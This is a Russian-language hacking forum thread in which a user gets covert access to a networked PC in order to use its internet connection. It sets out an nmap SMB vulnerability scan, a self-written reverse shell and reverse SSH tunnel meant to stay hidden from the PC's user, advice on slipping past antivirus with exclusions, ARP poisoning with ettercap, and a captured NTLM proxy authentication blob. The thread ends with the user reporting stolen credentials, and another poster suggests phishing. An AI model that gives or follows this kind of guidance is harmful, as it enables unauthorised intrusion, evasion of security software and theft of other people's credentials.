Дайте совет по эксплуатации и на что смотреть

larryalcina · 26.08.2021

Всем привет! Есть локальная сеть в которой у некоторых ПК есть доступ в интернет.
Цель получить доступ к шеллу одного из таких ПК, и получить доступ в нет на своем пк.
(Возможно поднять ссх и прокинуть между компами ссх туннель)
Просканил сеть в кали нмапом и легионом. Ниже скрины того что получилось.
Дайте совет что конкретно пытаться эксплуатировать и вообще на что смотреть. (Брут в последнюю очередь)

larryalcina · 29.08.2021

Нужен совет! Отзовитесь! ?

8oh8 · 01.09.2021

На смб в первую очередь

nmap -Pn --script smb-vuln* -p139,445

larryalcina · 06.09.2021

Решил действовать от обратного - на ПК с доступом в интернет запустил самописную программу, которая кидает реверс Шелл и устанавливает ssh туннель с моим пк. Проверил её на вирустотале - все ок. Но на ПК с нетом стоит антивирус 360 total security и он начал ругаться. Как так?

larryalcina · 06.09.2021

И ещё вопрос - когда 360 начал ругаться - он вывел на экран окошко, что мол обнаружен подозрительный файл и два варианта - разрешить/блокировать. Если нажать разрешить, то в дальнейшем ав продолжит выводить уведомления о этом файле или нет?

Kelegen · 06.09.2021

larryalcina сказал(а):

Если нажать разрешить, то в дальнейшем ав продолжит выводить уведомления о этом файле или нет?

Нет

kamzzzzz · 06.09.2021

larryalcina сказал(а):

И ещё вопрос - когда 360 начал ругаться - он вывел на экран окошко, что мол обнаружен подозрительный файл и два варианта - разрешить/блокировать. Если нажать разрешить, то в дальнейшем ав продолжит выводить уведомления о этом файле или нет?

Добавь в исключения АВ папку в которую будешь свои "эксперисентальные софты" заливать

larryalcina · 17.09.2021

Всем привет ещё раз! Нужна помощь
Вкратце повторю в чем состоит проблема: есть локальная сеть, в которой у моего пк доступа в интернет нету, а у пк2 есть. Нужно получить доступ в интернет посредством пк2. Сделаны следующие действия:
На своем пк запустил ssh-сервер на 443 порту
На ПК2 (с нетом) в командной строке прописал команду:
Ssh login@(ip моего пк) –p 443 –R 127.0.0.1:25582 –N (т.е подключается к моему пк по 443 порту и слушает 25582 порт моего пк)
*Сам клиет Ssh на пк2 установлен. Соединение ssh - постоянно (для простоты задачи).
Далее прокинул реверс шелл до себя
Соединение ssh между компами было установлено (исходя из файла auth.log(логи), смотрел уже у себя на пк)
Реверс-шелл тоже
Фото логов позже прикреплю
На своем пк в настройках браузера файрфокса выставил подключатся через сокс5 прокси на 127.0.0.1:25582 и поставил галочку отправлять днс запросы через прокси сервер
После вышеперечисленного пытаюсь в браузере зайти на какой-либо сайт – не дает, пишет «The connection has timed out»
Физического доступа к пк2 больше нет, но есть реверс-шелл из cmd с админ правами
*Непонятно как организован доступ в интернет на пк2, через впн/прокси/настройки маршрутизатора? и т.д.
Подскажите что сделать чтобы на своем пк получить доступ в интернет? О чем говорит, то что после выполненных действий интернета по-прежнему нет?
Дополнительно: на пк2 есть putty
P.S. важно - все действия произведенные на пк2 не должны быть видны
P.S.S за пользователя пк2 не брать прошаренного админа, но и хуевертить не стоит
*на пк2 стоит антивирус, винда 8.1
**из командной строки выхода в интернет тоже нет (8.8.8.8 не пингуется)

larryalcina · 18.09.2021

larryalcina · 26.09.2021

larryalcina · 28.09.2021

В общем, добрался до понимания как работает выход в интернет: на 250 ПК стоит прокси сервер, при установке настроек в своем браузере, что мол ходи через этот прокси, при подключении к какому-либо сайту выдаёт форму ввода логина и пароля
Я реализовал через etthercap arp poisoning - сработало. Пакеты с пк2(у которого доступ в нет есть) полетели через меня.(на этот самый прокси на 250пк)
В пакетах через wireshark нашёл аутефикацию
Вот так она выглядит:
Proxy-Authorization: NTLM TlRMTVNTUAADAAAAGAAYAHwAAAAAAQABlAAAAA4ADgBYAAAACAAIAGYAAAAOAA4AbgAAAAAAAACUAQAABYKIogYDgCUAAAAPaBE5122rEOXZM4lpDf2TFU8AQgAtAEQAUABOAEsARABQAE4ASwBPAEIALQBEAFAATgBLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1qcK1LnKn6MKyvDVRU7msBAQAAAAAAAMjZdO53s9cBPewUyRPsHNoAAAAAAgAOAEMATwBOAFQAUgBPAEwAAQAOAEMATwBOAFQAUgBPAEwABAACAAAAAwAOAGMAbwBuAHQAcgBvAGwABwAIAMjZdO53s9cBBgAEAAIAAAAIADAAMAAAAAAAAAABAAAAACAAADIQkV9yeHroB0U/rGpVWq9paPHAkFLyUkfhHlEHtnERCgAQAAAAAAAAAAAAAAAAAAAAAAAJACwASABUAFQAUAAvADEAMAAuADYANgAuADkANgAuADIANQAwADoAOAAwADgA=

Подскажите, это что такое? Хеш? Какие-то есть методы как из этого получить связку логин-пароль?

Lisenok · 13.10.2021

ntlm вроде написанно)а так хз, а если страницу где просит логин и пароль, так сказать подменить, тип фишинг, пусть при вводе логина и пароля через тебя креды улетают куда надо, меньше палева чтоб, как идея.

larryalcina · 15.10.2021

Lisenok сказал(а):

ntlm вроде написанно)а так хз, а если страницу где просит логин и пароль, так сказать подменить, тип фишинг, пусть при вводе логина и пароля через тебя креды улетают куда надо, меньше палева чтоб, как идея.

проблема решена, креды получены

Дайте совет по эксплуатации и на что смотреть

larryalcina

RAID-массив

Вложения

larryalcina

RAID-массив

8oh8

HDD-drive

larryalcina

RAID-массив

larryalcina

RAID-массив

Kelegen

TOXIC

kamzzzzz

(L1) cache

larryalcina

RAID-массив

larryalcina

RAID-массив

larryalcina

RAID-массив

larryalcina

RAID-массив

Lisenok

RAID-массив

larryalcina

RAID-массив